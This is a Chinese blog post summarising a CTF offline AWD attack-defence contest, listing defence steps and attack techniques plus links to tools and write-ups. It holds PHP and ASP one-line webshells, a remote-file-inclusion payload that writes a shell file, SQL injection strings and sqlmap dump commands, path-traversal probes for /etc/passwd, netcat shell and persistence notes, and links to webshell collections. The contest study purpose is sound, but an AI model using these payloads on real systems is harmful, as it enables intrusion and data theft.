CTF线下赛AWD总结
AWD
记录一下自己最近参加的线下攻防比赛,没时间学习了,就准备了几天,果然不出意外的被安全专业的大佬打得很惨。
缺点是不会攻击,我和我队友两个人就只有防,AWD防了400分,综合渗透拿了200分。
感觉自己的知识欠差很多,代码审计能力弱,写脚本能力弱,sql注入我一直学不会。最重要的是比赛前没有真正练习过,所以比赛时才没把技能发挥出来。谨记:多实践,学好代码审计,sql注入,手动写脚本!!
比完赛才对这两种比赛模式有了清晰的了解。
AWD就是每队有自己要维护的几台linux靶机,为低权限或者www权限,对自己的网站进行防守,对他人进行攻击。
综合渗透分外网,内网,专网,需要先渗透外网,在让外网作为跳板机访问内网,专网。
给了两个靶机是永恒之蓝漏洞,但比赛时没想到,就没法做,还有一台直接ssh登陆,就有几个flag。
比赛特别好,服务特别好,边打比赛,还有水果吃,住的宾馆,伙食很棒。对这次比赛满意,也涨了很多经验,督促自己如何去学习。下面是比赛时的源码。内附很多比赛之前看的网站,
一、ssh登陆,修改密码超级复杂,mobaxterm,xshell。
普通用户提权成root,根据kernel版本号找到对应的poc,exp提权。
二、下载源码,备份,/var/www/html 目录,mobaxterm,winscp,xftp等。
三、预留后门,御剑,k8飞刀,D盾,扫描目录,发现后门,注释代码。
四、修改数据库密码,
> mysql -u root -p
Show databases;
use mysql;
set password for root@localhost = password('123'); 或者
update user set password = PASSWORD('要更换的密码') where user = 'root';
flush privileges;
show tables;可能有flag。
select * from typecho_flag;
五、关闭不必要的端口,要求的服务端口不能关,
netstat -napt ,lsof -i 查看端口,
kill -9 PID 杀掉进程
nmap -sV ip地址(-sV参数可以探测目标主机的服务器版本)
nmap扫描对方开启的端口,21,22,21,3306,进行爆破,msfconsole进入metasploit ,,,
六、代码审计 seay源代码审计好用,
常见漏洞:一句话木马,SQL注入、文件包含、文件上传,越权访问,命令执行。
- 一句话木马
防:vim自己的网站php文件,注释掉一句话木马,
<?php @eval($_REQUEST['c']); ?> <?php @eval($_POST['c']); ?>
asp的一句话是:<%eval request("xx")%>
没有限制文件上传类型,允许后门上传
攻:菜刀连接一句话木马所在php的网站路径,输入密码,即可进入到后台,获取网站目录,进而上传大马,获取最高权限webshell。
没有的话,自行网站文件上传一句话木马,对文件类型有限制的话需要BurpSuite抓包,修改content type image/php,根据返回的路径,连接菜刀。
权限维持:1.不死马, 2. nc反弹shell nc -lp 9999
- SQL注入漏洞
(1)用户登录,输入’测试存在sql注入点,万能密码 ' or 1='1 弱密码 admin/admin 火狐插件hackbar
select name,pass from tbAdmin where name='' or 1='1' and pass='123456'
(2)啊D扫描网站sql注入点,sqlmap注入,
比赛时Access数据库注入点:
http://10.1.14.1/ReadNews.asp?NewsID=20&BigClassID=2&SmallClassID=2
sqlmap -u "url" 查看系统,版本
sqlmap -u "url" --dbs 爆数据库
sqlmap -u "url" --tables -D ctf 爆表
sqlmap -u "url" --column -D ctf -T users 爆列
sqlmap -u "url" --dump -D ctf -T users "user_name,user_pass" 爆字段
网站数据库密码信息文件一般放在config.php中。
3.文件包含
(1)本地文件包含
localhost/a.php?file=/flag.txt
(2)远程文件包含
localhost/a.php?file=http:ip/echo.txt
利用,上传一句话木马
echo.txt 文件内容,会生成shell.php 内容为一句话木马。
<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xx]);?>");?>
常见的文件包含函数,include(),include_once(),require(),require_once()
几种经典的测试方法:
?file=../../../../../etc/passwd 长目录截断
?page=file:///etc/passwd 读取敏感文件
?home=main.cgi
?page=http://www.a.com/1.php
http://1.1.1.1/../../../../dir/file.txt
4.越权访问 allow_url_fopen =ON, allow_url_include =ON
水平越权:修改id,访问他人
垂直越权:知道管理后台的url,通过访问,提升权限,获取数据。
/admin/upload/config.php 越权访问,无需登陆,直接显示
- 命令执行漏洞
直接调用操作系统命令,常见php函数system,exec,shell_exec
七、网站防御
上WAF,文件监控,安全狗,
在文件头写上,require_once(‘waf.php’);
八、日志分析,根据自己攻击payload去攻击他人。
写脚本批量拿flag。
综合靶场
Nmap扫描靶机,查看系统,metasploit 漏洞利用,根据相应的系统内核漏洞,提权,
获取后台密码,登录后台,根目录下flag
创建新用户,添加到管理员组,远程目标靶机。
可能存在flag的位置:
- 御剑扫描,双击网页打开,存在flag。
- ssh登陆,系统根目录下,/var/www/html下
- mysql数据库字段中。
- 远程主机桌面,文件夹下。
==================网站合集====================
www.51elab.com/product02.html 易霖博
https://www.anquanke.com/ 安全客 很棒
http://www.freebuf.com/ freebuf
http://www.mumaasp.com/139.html 很厉害的大马
http://webshell8.com/
http://www.jiaoben.net/wenzhanglist/93.html 脚本之家
==========================
线下赛笔记
https://blog.csdn.net/wy_97/article/details/78148705
http://www.sohu.com/a/211760248_99907709
https://www.anquanke.com/post/id/86984
https://www.anquanke.com/post/id/98574
https://www.anquanke.com/post/id/98653
https://www.anquanke.com/post/id/100991
https://www.anquanke.com/post/id/84675
http://tinyfisher.github.io/security/2017/10/02/CTF
http://www.freebuf.com/articles/web/118149.html
https://blog.csdn.net/like98k/article/details/80261603
=============================
https://www.exploit-db.com/exploits/15620/ 漏洞
http://exploit.linuxnote.org/ 内核漏洞
https://www.cnblogs.com/linuxsec/articles/6110887.html 提权
https://www.cnblogs.com/yuhuLin/p/7027342.html 普通用户提权
http://www.freebuf.com/sectool/121847.html Linux提权?这四个脚本可以帮助你
https://github.com/Ares-X/AWD-Predator-Framework AWD攻防赛webshell批量利用框架
https://github.com/admintony/Prepare-for-AWD AWD线下赛脚本集合
https://github.com/ssooking/CTFDefense CTFDefense
https://github.com/wupco/weblogger 针对ctf线下赛流量抓取(php)、真实环境流量抓取分析的工具
http://hackblog.cn/post/75.html waf
https://jingyan.baidu.com/article/d45ad148a8338769552b803a.html 安全狗安装教程
http://www.safedog.cn/website_safedog.html 安全狗linux版:
https://blog.csdn.net/qq_36328915/article/details/79305166 kali中msf常用命令
http://www.freebuf.com/articles/5472.html w3af简单使用教程
https://www.cnblogs.com/zylq-blog/p/6694566.html 安装
http://blog.51cto.com/simeon/1981572 MySQL数据库***及漏洞利用总结
http://blog.51cto.com/diudiu/1678358 SQLmap配合一句话木马
利用Sqlmap进行Access和MySQL的注入
https://note.youdao.com/share/?id=62ecd676d896139c823591e8a8bcc708&type=note#/
CTF线下赛AWD总结相关推荐
- CTF线下赛AWD攻防准备
CTF线下赛AWD攻防准备 最近发现一篇博客.感觉对CTF线下赛-AWD模式,总结比较好.于是学习了解了一下,为了方便寻找,把这篇博客复制了过来,并补充了点... 1.赛制流程:攻防模式(AWD)常见 ...
- awd的批量脚本 pwn_CTF线下赛AWD套路小结
CTF线下赛AWD套路小结 本文已在先知社区发表,欢迎访问,链接h 最近打了2场CTF线下赛,把AWD模式中的一些小套路做一些总结,本人web狗,二进制部分就不班门弄斧了. 一.AWD模式简介 AWD ...
- awd赛题的flag是什么意思_红帽杯线下赛AWD题目分析
上周打了一场红帽杯的线下赛,可惜开具发挥失误服务器down了几轮一度垫底-最后才又勉强上了点儿分-..赛后对题目中的几处比较有意义的漏洞做了一下分析,写出了下面篇文章. web1 web1是一个wor ...
- ctf线下赛mysql密码_CTF线下攻防赛
SSH登陆 两三个人进行分工,一个粗略的看下web,有登陆口的话,就需要修改密码,将情况反馈给队友,让登陆ssh的小伙伴进行密码的修改,改成炒鸡复杂.然后将Web目录下载下来,上WAF.文件监控.端口 ...
- CTF线下赛WAF【参考,自行修改】
原文链接:http://www.cnblogs.com/Oran9e/p/7233478.html 作者:Oran9e 期待已久的WAF <?phperror_reporting(0);defi ...
- CTF线下AWD攻防模式的准备工作及起手式
作为大一萌新我并没有打过AWD,可能我做梦都没有想到人生的第一场AWD是DEFCON CHINA吧~(滑稽 我自己在服务器上搭了一个cms来模拟AWD场景. 0X01 改ssh密码 官方在给出服务器密 ...
- ctf线下AWD攻防赛学习笔记
Hello,我是普通Gopher,00后男孩,极致的共享主义者,想要成为一个终身学习者.专注于做最通俗易懂的计算机基础知识类公众号.每天推送Golang技术干货,内容起于K8S而不止于K8S,涉及Do ...
- CTF线下AWD攻防步骤总结
Hello,我是普通Gopher,00后男孩,极致的共享主义者,想要成为一个终身学习者.专注于做最通俗易懂的计算机基础知识类公众号.每天推送Golang技术干货,内容起于K8S而不止于K8S,涉及Do ...
- ISCC线下赛参赛感悟
关于ISCC线下赛参赛感悟(之前就想发出来了,但是一直没时间,刚好赶上了1024就浅浅发一下吧) 一句话感悟 我好菜呀,ctf菜,awd更菜. 关于CTF部分 总结: 大佬是真的牛,选择题290+,不 ...
最新文章
- java web nodejs_我的2013--从java web到nodejs
- 【Linux】40.date设定系统时间
- 《使用Nessus进行渗透测试》- 简介
- 自动跟随机器人:一种简易的自动跟随方案,自动跟随小车、自动跟随平衡小车、STM32、基于超声波的自动跟随小车
- 不得不说--自动化测试元素定位与用例设计
- C++/C--动态二维数组的内存分配与释放【转载】
- oss批量上传工具_OssExplorer一OSS的专用客户端工具【最新版】_Windows_Windows server 2008-云市场-阿里云...
- c java交互_C和Java程序之间的交互/通信
- [转]几种软件测试工具
- 网络收包流程-网络层处理流程ip_rcv(五)
- python跑酷游戏源码_开源一款酷跑游戏源码完整版
- 小米手机hbuilder开发者模式
- 运行Android项目时,报Installation failed due to invalid APK file!错误的解决办法
- 路由器和交换机的区别
- Python画一个中国地图玩玩
- 称重管理系统方案之车牌识别摄像机的应用
- linux定制欢迎界面motd,linux 界面 /etc/motd
- Mac Safari, Chrome 浏览器劫持 SearchSystem Search 恶意插件移除 尝试Brave浏览器
- 2.5.3 文法二义性的消除
- Python黑科技:暴力破解,你的密码真的安全么?
热门文章
- 计算机技术与软件业余资格测验证书,在大学能否领到网络工程师资格证?网络工程师考核..._出版资格_帮考网...
- 【推免攻略】五.2022年北交计算机学院夏令营、预推免保研经验
- 时间复杂度分析:递归算法
- SQLSERVER 2000 以及SQL Server 2005的版本号
- 水印watermark
- 《算法竞赛入门经典(第二版)》pdf
- Response to preflight request doesn‘t pass access control check: No ‘Access-Control-Allow-Origin跨域问题
- [SOA介绍]什么是SOA
- cmd批量创建文件和文件夹
- echarts折线图设置圆点_echarts 设置折线图单个数据小圆圈样式